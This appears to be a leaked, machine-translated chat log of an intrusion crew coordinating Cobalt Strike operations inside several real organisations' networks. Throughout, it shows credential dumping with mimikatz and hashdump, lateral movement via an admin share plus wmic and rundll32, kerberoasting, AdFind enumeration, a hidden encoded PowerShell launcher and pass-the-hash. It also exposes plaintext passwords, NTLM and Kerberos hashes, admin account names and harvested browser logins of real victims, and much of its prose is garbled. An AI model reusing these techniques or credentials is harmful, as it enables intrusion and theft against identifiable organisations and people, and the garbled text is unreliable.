Windows Defender 2. The categorization is 3. no we just need to collect this information, we need to find it in the logs/reports. Please write us all about the domains we are working with 1 - Is anti-virus/edr identified in all domains? 2 - Did you categorize server systems by purpose in all domains?
3 - Did you find the main segment where sysadmins and network-engineers are sitting? Let's do a quick walkthrough here we need to decide if we're ready for the final phase of the problem with the network again the emphasis on the winlogon last output from winlogon not in the other to the swhost, in winlogon passed on one machine shot in swhoste here local users gives hashdump and in the mime hash computer and not a single user. it does not migrate there. you shoot from winlogon? somewhere so gives out

```
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
[-] no results
```

```
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 438866 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
```

Priority on the host win-server by other hochuchek la current on tachkada unlikely it is castrated, most likely AB does not give hashdumps with mimic does not give v system processes not injctctitated some lA goes out got where tried above that i dumped was oldmag, already out newer i built the concatenation you dumped today i will build clean dllskin x64dll dirty no, as a matter of fact, there is no problem, i do not have any problem with it, i don't have any problems with it.

```
beacon> shell copy x64.dll \\139.62.166.164\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\139.62.166.164\C$\ProgramData
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /NODE:139.62.166.164 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /NODE:139.62.166.164 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 121 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 8008;
        ReturnValue = 0;
};

beacon> shell dir \\139.62.166.164\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\139.62.166.164\C$\ProgramData\x64.dll
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \\139.62.166.164\C$ is Windows
 Volume Serial Number is FC53-858D

 Directory of \\139.62.166.164\C$\ProgramData

File Not Found
```

Well, get into other hosts where you're adminska. I can say that we sat idle for a month, and I remember it only about Remote Admin =) Say that the first time I heard it) :man_facepalming: :thinking: your polzak there local admins can check there rps requests if your polzak see shara admin$ in the course, yes? and why go there?) and there is nothing interesting all the same I on a few machines in the admin's balloon came

```
Shares for COB-65749:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ADMIN$
C$
```

XDSPVSSERV05 what's your current drive? I'm browsing through SharpShares now, nothing particularly interesting I've found so far, what have you done in general or in the last +- hour?
```
beacon> psinject 15344 x64 Invoke-Kerberoast -domain itstest.ad | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -domain itstest.ad | fl into 15344 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
```

Rubeus only kerberoast in the trust under number 0 he trusts himself)

```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
unfcsd.unf.edu
```

What is he doing in the trusts? under number 3 the current domain is tripped he only took from it as I see it from the toolchain did he poll the kerbs from all? while he is poking around in other domains?
did not poll them with adfind? xp one dead 2003 not five, alive only this win 2008

```
beacon> shell ping PHONEBILLING.unfcsd.unf.edu
[*] Tasked beacon to run: ping PHONEBILLING.unfcsd.unf.edu
[+] host called home, sent: 63 bytes
[+] received output:
Pinging PHONEBILLING.unfcsd.unf.edu [139.62.201.87] with 32 bytes of data:
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128

Ping statistics for 139.62.201.87:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```

Thank you + have + extracted.

```
/home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe
```

are you sure you have the right file here? uhh here's the toolchain Invoke-Kerberoast well here's the toolchain file with your hands

```
[*] cd C:\ProgramData\
[+] host called home, sent: 23 bytes
[-] File /home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe is not a process assembly (.NET EXE)
```

Please give me the full log with the manual start and the toolchain startup.

```
[*] cd C:\ProgramData\
[+] host called home, sent: 23 bytes
[-] File /home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe is not a process assembly (.NET EXE)
```

@user8 did you know you can kerberoast trust domains?
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
[*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
[+] host called home, sent: 318171 bytes
[+] received output:
   v1.5.0

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[X] No users found to Kerberoast!

[*] Roasted hashes written to : C:\ProgramData\hashes.txt
```

```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
[+] host called home, sent: 318127 bytes
[+] received output:
   v1.5.0

[*] Action: AS-REP roasting

[*] Target Domain          : unfcsd.unf.edu

[*] Searching path 'LDAP://doc2.unfcsd.unf.edu/DC=unfcsd,DC=unf,DC=edu' for AS-REP roastable users

[X] No users found to AS-REP roast!

[*] Roasted hashes written to : C:\ProgramData\asrephashes.txt
```

GPP:

```
[RESULT] Username: student
[RESULT] Changed: 2013-11-19 17:00:59
[RESULT] Password: 1510

[RESULT] Username: Presenter
[RESULT] Changed: 2011-06-27 18:57:56
[RESULT] Password: presenter

[RESULT] Username: Podium
[RESULT] Changed: 2015-08-21 18:42:19

[RESULT] Username: student
[RESULT] Changed: 2017-04-07 13:46:59

[RESULT] Username: cislocal
[RESULT] Changed: 2017-04-07 13:47:25
```

If you don't see cmd then you can't see the output of 7za it works within the parent process cmd 7za console app I wonder if on the target machine 7za.exe works in the background or a window appears? otherwise take it and delete it as usual or take the harddack from them if you want to do a silent delete with overwriting) and is it silent? when i clean it, will it ever get deleted? i mean, will it ever get deleted? will it ever get deleted? archive it and take it away)) 505 megabytes of it, it's probably just a fat hell or netschek pshell adFind.bat

```
adfind.exe -f "(objectcategory=person)" > ad_users.txt
adfind.exe -f "objectcategory=computer" > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > trustdmp.txt
```

adfind through the batek startup already, I was looking to finish the sitinfo or not through the type where the shell, execute, etc. dd handy to remove, it came out:

```
C:\ProgramData>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
```

and so far is silent ad_users.txt - 0 bytes.
```
beacon> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 104513 bytes
[+] received output:
List of domain trusts:
    0: ITSTEST itstest.ad
    1: UNFMAN unf.man
    2: ADROOT unf.edu (Forest tree root) (Direct Outbound) (Direct Inbound)
    3: UNFCSD unfcsd.unf.edu (Forest 2) (Primary Domain) (Native)
```

also please net domain_trusts.

```
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:
 Server Name    IP Address
 -----------    ----------
 DOC1           139.62.200.188
 DOC2           139.62.200.189
 DOC4           139.62.200.191
 DOC3           139.62.200.190
 AZPDDC01       10.249.1.8
 AZPDDC02       10.249.1.9

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
unfcsd.unf.edu
```

DA:

```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
Administrator  donh  donovanf  johns  krist  mikeh  ServiceAdmin
The command completed successfully.
```

LA:

```
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator  CtxAppVCOMAdmin  UNFCSD\Domain Admins  UNFCSD\Nervief  UNFCSD\Server Admins
The command completed successfully.
```

EA:

```
The request will be processed at a domain controller for domain unfcsd.unf.edu.
The group name could not be found.

More help is available by typing NET HELPMSG 2220.
```

in private, of course) is it for me? :point_right::point_left: is) what do you say there is a clean coba?) at 21550 stalled and has been standing for about 10 minutes pererazhdaya at 21956 stopped :/ you have output on a few meters long loading in the coba restart all yet?
column last not updated now cobalt itself suspend 3 and kill one in the first is crashed in bacon adfind the second doesn't give the output work the second + so you have 2 sessions? exit will help, no? i have to kill all jobs at once i can't see the list of jobs even well this one kills one by one ls while not that pwd in the second session output appeared all jobs at once kill or `jobs -K`? does not work like in the msf `jobkill -K` but the session did come here's the second session, will it lag? closed the kmd and it disappeared at one point appeared near the file LockFile still? i called kmd through a shortcut i think just lag hell because the adfind pours in biconna mbd somewhere on fw cut your domainpal and started me to shove their adfind? xd when the bicon receives commands and does not give anything and lags horribly most likely spalili even in bicon does not go silent her ilsona silent her pwd she does not output anything made another session i did a copy through the pkmya no jobs output in the session can not, nothing because i have to use pkma it actually looks like this on the screenshot i made ktrl+a and copy in bicon it prints adfindcockxxxxx

```
powershell -nop -w hidden -encodedcommand ...
```

bicon log output please attach with this problem. Why does it do this is not very clear. The output is normal in bicon shortly output hell was downloaded - 150 bytes archive and 0 bytes folder inside only wrote off and livelyanu magic ran the offer toolchain and session hung for 2 minutes already

```
https://login.veeam.com/,https://login.veeam.com/auth/realms/veeamsso/protocol/openid-connect/auth,21/12/2020 15:27:42,13253038062778136,londonit@ballymoregroup.com,I ?$??c$C?
```

c$c$ non-printers didn't exist at all.
```
192.0.2.117:445 (platform: 500 version: 4.9 name: PREMIERNEW domain: WORKGROUP)
192.0.2.214:445 (platform: 500 version: 6.1 name: TV-BALLY-S4P10 domain: WORKGROUP)
192.168.3.206:445 (platform: 500 version: 2.0 name: KM89B642 domain: KM-NetPrinters)
192.168.3.202:445 (platform: 500 version: 2.0 name: KM8FD05B domain: KM-NetPrinters)
192.168.3.204:445 (platform: 500 version: 2.0 name: KM892613 domain: KM-NetPrinters)
```

```
https://login.veeam.com/tarnold Canary5500
```

192.0.2.3:443 192.0.2.3:80 - us Username : admin Password : -6&J{*n]e73e]Mm
192.0.2.1:443 192.0.2.1:80 - VMWare ESXi tried the nasa crescendos First - Connection to ESXi host timed out Then - Cannot complete login due to an incorrect user name or password.
192.0.2.213:443 192.0.2.213:80 192.0.2.213:22 (SSH-2.0-OpenSSH_7.9) - ASRockRack IPMI web gui system monitoring Username : admin Password : admin
192.0.2.248:443 192.0.2.248:80 192.0.2.248:22 (SSH-2.0-mpSSH_0.2.1) - iLO 4 ProLiant HP, tab "iLO: Bally44Backup-iLO.ballymoregroup.local" However, the Ping request could not find host Bally44Backup-iLO.ballymoregroup.local. Please check the name and try again.
192.168.3.162:443 192.168.3.162:22 (SSH-2.0-mpSSH_0.2.1) - iLO 5 ProLiant host is ILOCZ292107HT.ballymoregroup.local Ping request could not find host ILOCZ292107HT.ballymoregroup.local. Please check the name and try again.
192.168.15.158:80 - IIS Windows Server
192.0.2.99:80 - IIS Windows Server
192.0.2.246:80 - IIS7
192.168.3.202:443 - kyocera printer scanner
192.168.3.207:443 - HP DesignJet T1600 Printer
192.0.2.243:8080 192.0.2.243:443 192.0.2.243:80 - HP DesignJet T2530 PostScript printer
192.168.3.201:443 - printer hp LaserJet 4200
192.0.2.214:443 192.0.2.214:80 - tab "TV-BALLY-S4P10 - Control Page", link "https://7bj6wypy6p.dattolocal.net/login", Portal based login is enabled for this device. In order to access this device, you must have a Datto Partner Portal account. The Portal-Login button redirects to "https://auth.datto.com/login".

Checked DA with domain @, it didn't go through.

192.0.2.27:80 - Schneider Electric is a European multinational company providing energy and automation digital solutions for efficiency and sustainability. It addresses homes, buildings, data centers, infrastructure and industries, by combining energy technologies, real-time automation, software and services. No Credits
192.168.3.161:443 - asks for username and password on the fly
10.0.180.254:8080 10.0.180.254:443 - WatchGuard https://10.0.180.254/sslvpn_logon.shtml
192.168.3.21:443 - VIA Collaboration Hub With any laptop or mobile device, VIA wireless presentation and collaboration solutions let meeting participants share any size file, edit documents together in real time, turn the main display into a digital whiteboard, chat with other users, and stream full uninterrupted HD video (up to 1080p60). Two buttons, Run and Install, both suggest downloading the software
192.0.2.117:22 (SSH-2.0-OpenSSH_5.3)
192.0.2.105:22 (SSH-2.0-dropbear)
192.0.2.71:22 (SSH-2.0-dropbear)
192.0.2.59:22 (SSH-2.0-dropbear)
192.0.2.50:22 (SSH-2.0-dropbear)
192.0.2.48:22 (SSH-2.0-dropbear)
192.0.2.39:22 (SSH-2.0-dropbear)
192.0.2.24:22 (SSH-2.0-dropbear)
192.0.2.15:22 (SSH-2.0-OpenSSH_4.3)
192.0.2.9:22 (SSH-2.0-dropbear)
192.0.2.4:22 (SSH-2.0-dropbear)
192.168.72.100:22 (SSH-2.0-dropbear)
192.168.72.77:22 (SSH-2.0-dropbear)
192.168.72.55:22 (SSH-2.0-dropbear)
192.0.2.250:443 192.0.2.250:80 192.0.2.250:22 (SSH-2.0-OpenSSH_6.2 PKIX) - did not open, the tab in the browser is called "Document Moved"
192.0.2.242:443 192.0.2.242:80 - failed to open
192.0.2.237:80 - did not open, "TDSi Ethernet to Serial Module" tab
192.0.2.235:443 192.0.2.235:80 - failed to open
192.0.2.234:443 192.0.2.234:80 - did not open --- Chromium Credential (User: nreid) --- URL : http://192.0.2.234/wcd/login.cgi Username : Password : 1234567812345678
192.0.2.233:443 192.0.2.233:80 - failed to open
192.0.2.232:80 - did not open, "TDSi Ethernet to Serial Module" tab
192.0.2.230:443 192.0.2.230:80 - failed to open
192.0.2.222:443 192.0.2.222:80 - failed to open
192.0.2.219:80 - does not open all the way, "Hewlett Packard" tab, blue panel on the left with the hp logo
192.0.2.191:80 - Hewlett Packard tab did not open
192.0.2.190:443 192.0.2.190:80 - failed to open
192.0.2.95:8080 - it didn't open
192.168.3.206:443 - failed to open
192.168.3.204:443 - failed to open
192.168.3.130:443 - failed to open
192.168.15.252:80 - did not open, "NETGEAR" tab
192.168.15.251:80 - did not open, "NETGEAR" tab
192.168.15.206:443 192.168.15.206:80 - it didn't open
192.168.15.106:80 - didn't open
192.168.72.200:443 192.168.72.200:80 - it didn't open
192.168.72.158:80 - didn't open
192.0.3.10:80 - it didn't open
10.0.180.4:443 10.0.180.4:80 - did not open

```
Entry : g84.p4.webrootcloudav.com https://www.webroot.com/us/en
```

```
BALLYMOREGROUP\Administrator K33p1ngIT53cur3!?!?
```

I haven't run into this suite in general, it doesn't matter, if there is it must be with doppelgänger averländernen in filtrechek malware alerte in video logger voor voor aletztige logiweb gui monitoring systema voor dezeen nowsoxx voor dezeen, gimme a screenplay

https://en.wikipedia.org/wiki/Intelligent_Platform_Management_Interface

Give me a link @tl1 @tl2 Have not encountered IPMI? What is this thing?
Scanner module is complete.

on the forum access is closed. Drop user1 everywhere + change the pass in the general resources, his coba will be closed within 2 hours. I thought I was going to the wrong forum)) oops fucked up, already raised) and what domain? It is lying) why?
yes, so good that now themselves on the forum do not get) @user1 account on the forum and everywhere else is closed? Maybe less detects than the current active, or additional functionality. I have not looked, it does not develop. The point of it? Another analogue on the empire? Of course I tried different ones. At different ports. Pointed to the inner ipe? Ratnik does not work, no bounce check those 2 softy about which above wrote? Yes, I know, they just do not yet (sessions would us. user1 does not work with us. I have you offline. What do you mean where? Where is @user1 @user3? https://www.youtube.com/watch?v=OvESADFx2eE Scheme of a remote MITM attack on the WSUS system https://www.securitylab.ru/analytics/479780.php user9 Good day quotqqhint problems with cryptamines wasn't scheduled today what's up?

```
List of domain trusts:
    0: WINONA winona.rtpco.local (Forest 2) (Direct Outbound)
    1: ALLOY us.alloypolymers.com (Direct Outbound) (Direct Inbound)
    2: RTPCO rtpco.local (Forest tree root) (Primary Domain) (Native)
```

contiguous DA between RTPCO and ALLOY:

```
cancelet
sagert
```

there is no contiguous DA with WINONA there may be contiguous info than you entered the trust you can poke what is left you have data from the trust

```
Group name     Enterprise Admins
Comment        Designated administrators of the enterprise
System error 8519 has occurred.

A global group cannot have a cross-domain member.
```

```
Get list of DCs in domain 'rtpco.local' from '\\HendDC1.rtpco.local'.
MNDomain6.rtpco.local [DS] Site: Winona
HendDC1.rtpco.local [DS] Site: Henderson
TXDC2.rtpco.local [DS] Site: texas
TXDC1.rtpco.local [DS] Site: texas
HendDC2.rtpco.local [DS] Site: Henderson
VADC2.rtpco.local [DS] Site: VA
VADC1.rtpco.local [DS] Site: VA
MXDC2.rtpco.local [DS] Site: Mexico
MXDC1.rtpco.local [DS] Site: Mexico
ShenzDC1.rtpco.local [DS] Site: China
SingDC1.rtpco.local [DS] Site: Singapore
ShenzDC2.rtpco.local [DS] Site: China
SuzhouDC1.rtpco.local [DS] Site: Suzhou
SuzhouDC2.rtpco.local [DS] Site: Suzhou
FranceDC1.rtpco.local [DS] Site: France
FranceDC2.rtpco.local [DS] Site: France
GermanyDC1.rtpco.local [DS] Site: Germany
GermanyDC2.rtpco.local [DS] Site: Germany
INDC2.rtpco.local [DS] Site: Indy
DC1Poland.rtpco.local [DS] Site: Poland
DC2Poland.rtpco.local [DS] Site: Poland
NVDC1.rtpco.local [DS] Site: Nevada
OrangeDC.rtpco.local [DS] Site: Orange
MNDC2.rtpco.local [PDC] [DS] Site: Winona
INDYDC1.rtpco.local [DS] Site: Indy
CrocketDC1.rtpco.local [DS] Site: Crocket
PolandDC1.rtpco.local [DS] Site: Poland
OHDC.rtpco.local [DS] Site: Ohio
```

```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
Administrator  arobinsona  cancelet  kaseyaservice  O365Service  sagert  spicescan
```

rtpcompany.com dats amaizing joni) eee

```
beacon> shell dir \\89.0.192.165\C$
[*] Tasked beacon to run: dir \\89.0.192.165\C$
[+] host called home, sent: 52 bytes
[+] received output:
 Volume in drive \\89.0.192.165\C$ has no label.
 Volume Serial Number is FC6D-43E6

 Directory of \\89.0.192.165\C$

03/12/2018  03:08 PM             1,523 cdata.log
01/04/2021  10:27 AM                   kworking
08/22/2013  09:52 AM                   PerfLogs
12/26/2020  04:18 PM                   Program Files
05/22/2019  04:39 PM                   Program Files (x86)
01/01/2021  09:00 AM                   Temp
09/19/2018  09:59 AM                   Users
12/26/2020  04:18 PM                   Windows
               1 File(s)          1,523 bytes
               7 Dir(s)  63,537,639,424 bytes free
```

Check with the admin on the server skul.
Global Group memberships *VSA_Admins *Test_Alloy *IT *SQL Server Admins

Well datak you online or not? and the two sessions that I asked respawned again deadspavnas not working with the domain also can not without the token however can not get the list dk and shuffle the point instead of the domain did tokenak came tried the admin hash that above skilja while with waterwaytut how are we doing? While we're still working on this grid, we can hang and graze again during working hours, when they show up )) Sure, they have a lot of data there)) it would be cool to get into the network of these guys) probably through a VPN go to several computers that are in Invey and then do not pinged 445 sees? well ping 10.0.0.96 does not pass kakip not pinged? maybe yes. VannData is a company that configured them backups. There's also an odd thing - I hung invey and he caught something like `10.0.0.96 VANNDATA\patykr` but such IP is not pinged, I think, perhaps it's just those outsourcers via vpn or something like that ... no. There's no way to find the IT guys. They are logged in a couple of places but under DA codes, and even chrome is empty under them. The network is small, maybe outsource?
It's necessary in any case: there are the cracks from one NAS, and no cracks from the system that manages backups and one NAS on all machines in the domain: I checked all the files through SauronEye and manually, took off the chrome-dump - found no cracks of interest. Downloaded a backup of the mail IT specialist, there is correspondence on the implementation of backups, but no passwords in the mail. In addition, the people involved in the correspondence about the backups (2019), now in the AD are absent341 pc.Looking for computers from the same OU as the current username only in routervpn seems to nouchuchat in the beginning - more was. strange as tovhodny point behind the vpn?see himself and the printer 445 see? and i want to do so, but is not pinging nihilo check other machines in this group for admin rights? clearly the system You have a local user admindae and what? i am again dumb? you took off the hell why?i will smb login to check if i find something, maybe from here there are routes to somewhere else, because he can not get a list of DCs, and around no one else no other options? i'll scan the network in large chunks, maybe i'll find someone ... and the rest checked?there's nowhere to put you put the kerbs? there's no one around, i have to jump on the dk, i guess it's LAa needed for the local accounta you did for a specific car the domain is still .pth W08872612198\"Remote Support" 296c19b3d2cb8e8729e5fe27f6cf764a in quotes did you do that? definitely better `` user : remote support domain : W08872612198 program : C:\Windows\system32\cmd.exe /c echo 083dd8b28e4 > \.\pipe\f5604a impers. : no NTLM : 296c19b3d2cb8e8729e5fe27f6cf764a | PID 48836 | TID 39276 | LSA Process is now R/W | LUID 0 ; 1888192397 (00000000:708b878d) \_ msv1_0 - data copy @ 000002A8A21DC080 : OK ! \_ kerberos - ``It doesn't look like it came out remote? user : remote domain : W08872612198 program : C:\Windows\system32\cmd.exe /c echo 6d969cf0c1b > \\.\pipe\36c22c impers. 
: no NTLM : 296c19b3d2cb8e8729e5fe27f6cf764a | PID 1112 | TID 37960 | LSA Process is now R/W | LUID 0 ; 1888127822 (00000000:708a8b4e) \_ msv1_0 - data copy @ 000002A8A1FDF650 : OK ! \_ kerberos - ``I think it worked.'' Try the goo. How do you defeat the gap? beacon> pth ".\Remote Support" aad3b435b51404eeaad3b435b51404ee:296c19b3d2cb8e8729e5fe27f6cf764a [-] pth error: argument 'Support' is not an NTLM hash Why don't you use the remote support account? There's also the LA, I'll try with it...can I put them there? $krb5tgs$23$*scom$jdossn.local$MSSQLSvc/jdoscom02.jdossn.local ``Clear no, but this is YES``$krb5tgs$23$*svc_scomsql_2019$jdossn.local$MSSQLSvc/JDOSCOMDB61B.jdossn.local ``Clear no''. Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Jason:1003:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4::: Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:296c19b3d2cb8e8729e5fe27f6cf764a::: W08872612198:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:039c94e617f2f4dd3651ee3873e640ea::: ``LA ``` Administrator JDOSSN\Domain Admins JDOSSN\NDLEADING_All_Users JDOSSN_DLEADING_Computer_Account_Admins JDOSSN/Sedona_CROPS_Admins Remote Support W08872612198 The command completed successfully. ``EA ``` [*] Tasked beacon to run: net group "enterprise admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain jdossn.local.
Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- The command completed successfully. ``DA ``` Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- a900221 AuditDB_svc AuditJDOSSNDA DHSAdmin jdodmp_svc MPXAXDAgentAccount PAM_PRD_JDO_EQI_01 PAM_PRD_JDO_EQI_02 scom svc_audit svc_BuildAutomator svc_exchange svc_OMAA svc_OMDAS svc_OMREAD svc_scomsql_2019 svc_snow_preprod The command completed successfully. ``net accounts ``` Force user logoff how long after time expires? Minimum password age (days): 1 Maximum password age (days): 84 Minimum password length: 10 Length of password history maintained: 24 Lockout threshold: 8 Lockout duration (minutes): Never Lockout observation window (minutes): 15 Computer role: BACKUP The command completed successfully. I don't see anything about the correct domain, they haven't cleaned it out i just renamed the confab. why did they clean it out? and can you tell me the name of the PC where you came from? epcusa.com i will pass it on somehow the domain is admin it means you have to reopen it. current time2020-12-23, 00:42:57a what about a day ago? it's more like a year ago2020-12-22, 01:01:54 what was on the net now I'll check it tell me what needs to be reopened $krb5tgs$23$*spps2007$epctech.com$MSSQLSvc/SQLSRV03.epctech.com ``There don't seem to be any sessions expected, but I made it here. $krb5tgs$23$*avman$epctech.com$MSSQLSvc/ Kaspersky2013 ````somerd.com` live session here beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: televisa.com.mx ``` liveuser9okskin in ls, when he comes he will throw in the brututtorogi no timlid? to whom to give the hash? 
\JDOXADIRC1.jdossn.local\ADMIN$ - Remote Admin \JDOXADIRC1.jdossn.local\C$ - Default share \JDOXADIRC1.jdossn.local\IPC$ - Remote IPC \W088726111915.ndleading.jdossn.local\ADMIN$ - Remote Admin \W088726111915.ndleading.jdossn.local\C$ - Default share \W088726111915.ndleading.jdossn.local\IPC$ - Remote IPC \W088726111915.ndleading.jdossn.local\print$ - Printer Drivers \W088726111915.ndleading.jdossn.local\Upstairs Printer - Upstairs Printer \WW08872611194.ndleading.jdossn.local\ADMIN$ - Remote Admin \W08872611194.ndleading.jdossn.local\C$ - Default share \W08872611194.ndleading.jdossn.local\IPC$ - Remote IPC \WW08872611194.ndleading.jdossn.local\nic - nic \WW08872611194.ndleading.jdossn.local\print$ - Printer Drivers \\JDOFIEECONN01.jdossn.local/ADMIN$ - Remote Admin \JDOFIEECONN01.jdossn.local\C$ - Default share \JDOFIEECONN01.jdossn.local/IPC$ - Remote IPC \JDOXADIRD1.jdossn.local/ADMIN$ - Remote Admin \JDOXADIRD1.jdossn.local\C$ - Default share \JDOXADIRD1.jdossn.local\IPC$ - Remote IPC \JDOdc65.jdossn.local/ADMIN$ - Remote Admin \JDOdc65.jdossn.local\C$ - Default share \JDOdc65.jdossn.local\DealerConfig - \JDOdc65.jdossn.local\EQAPP - \JDOdc65.jdossn.local\EQDBBackup - \JDOdc65.jdossn.local\EQPROF - \JDOdc65.jdossn.local\EQUIPArchive - \JDOdc65.jdossn.local\EQUIPAttachments - \JDOdc65.jdossn.local\EQUIPREPORTS - \JDOdc65.jdossn.local\HomeDirs - \JDOdc65.jdossn.local\IPC$ - Remote IPC \\Lockouts - Lockout logs \JDOdc65.jdossn.local\MISCPROF - \JDOdc65.jdossn.local\MXHomeDirs - \JDOdc65.jdossn.local\MXShares - \JDOdc65.jdossn.local\NETLOGON - Logon server share \\Logon server share \JDOdc65.jdossn.local\SD - \JDOdc65.jdossn.local/SDAttach - \JDOdc65.jdossn.local/SDPROF - \JDOdc65.jdossn.local\Shares - \JDOdc65.jdossn.local\SYSVOL - Logon server share \W08987711192.ndleading.jdossn.local\ADMIN$ - Remote Admin \W0W8987711192.ndleading.jdossn.local\C$ - Default share \W0W8987711192.ndleading.jdossn.local\IPC$ - Remote IPC 
\WW08987711192.ndleading.jdossn.local\NPI02DE8A (HP LaserJet 400 M401dne) - NPI02DE8A (HP LaserJet 400 M401dne) \\{\W08987711192.ndleading.jdossn.local\print$ - Printer Drivers \W0W8987711192.ndleading.jdossn.local\TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4) - HP Color LaserJet Pro M478f-9f PCL-6 (V4) ``D33r3123`` aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee `````` dn:CN=Administrators,CN=Builtin,DC=jdossn,DC=local >objectClass: top >objectClass: group >cn: Administrators >description: Administrators have complete and unrestricted access to the computer/domain >member: CN=VMjoinJDOSSN Group,OU=VM Clone Customization,OU=Service Accounts,DC=jdossn,DC=local >member: CN=a900221,OU=Patrol,OU=Service Accounts,DC=jdossn,DC=local >member: CN=Operations_All_Users,OU=Groups,OU=Operations,OU=JDIS,DC=jdossn,DC=local >member: CN=CAG,OU=Citrix,OU=Service Accounts,DC=jdossn,DC=local >member: CN=Enterprise Admins,CN=Users,DC=jdossn,DC=local >member: CN=Domain Admins,CN=Users,DC=jdossn,DC=local >member: CN=DHSAdmin,CN=Users,DC=jdossn,DC=local `````` https://cloudsso.cisco.com/,https://cloudsso.cisco.com/sp/startSSO.ping,7/27/2018 11:23:30 AM,13177182210062277,nicd@leadingedgeequip.com,vgy7vgy7VGY ``Microadmin. 
``` * Username : ndmicdgeorg * Domain : JDOSSN * NTLM : 053a03895fad0c33bb088137941ec5bc * SHA1 : 27f1f87e2764ab71e5c971af2119f9750b2e01c0 * DPAPI : 57c9711ddeb916f0bce56ce6f6fe6a `````` http://directwi.jdossn.local/,http://directwi.jdossn.local/Citrix/XenAppDirectWI/auth/login.aspx,5/30/2017 12:20:27 PM,13140638427060024,ndcarddalma,bhu8bhu8 `````` * Username : ndmictrobin * Domain : JDOSSN * NTLM : 23a7ccf40635bc590c3c98dbeed94e01 * SHA1 : b2907d5a9d75a60ddcb5ac994c26f5c567d83db2 `````` https://account.activedirectory.windowsazure.com/,https://account.activedirectory.windowsazure.com/ChangePassword.aspx,4/30/2019 10:30:51 AM,13201111851838636,,sWKwEcC2T:Gq62X `````` https://sso.cisco.com/,https://sso.cisco.com/autho/forms/CDClogin.html,7/30/2018 9:01:24 AM,13177432884691813,nicd@leadingedgeequip.com,vgy7vgy7VGY `````` [00000003] Primary * Username : ndmictflana * Domain : JDOSSN * NTLM : 7bba5ae0ee513a322b7cf6b8768bb063 * SHA1 : 758182c25f76e6b83dbdaba52642e49326f558d9 `````` https://iduiaas.cloudapps.cisco.com/,https://iduiaas.cloudapps.cisco.com/web/registrationForm,7/27/2018 11:18:23 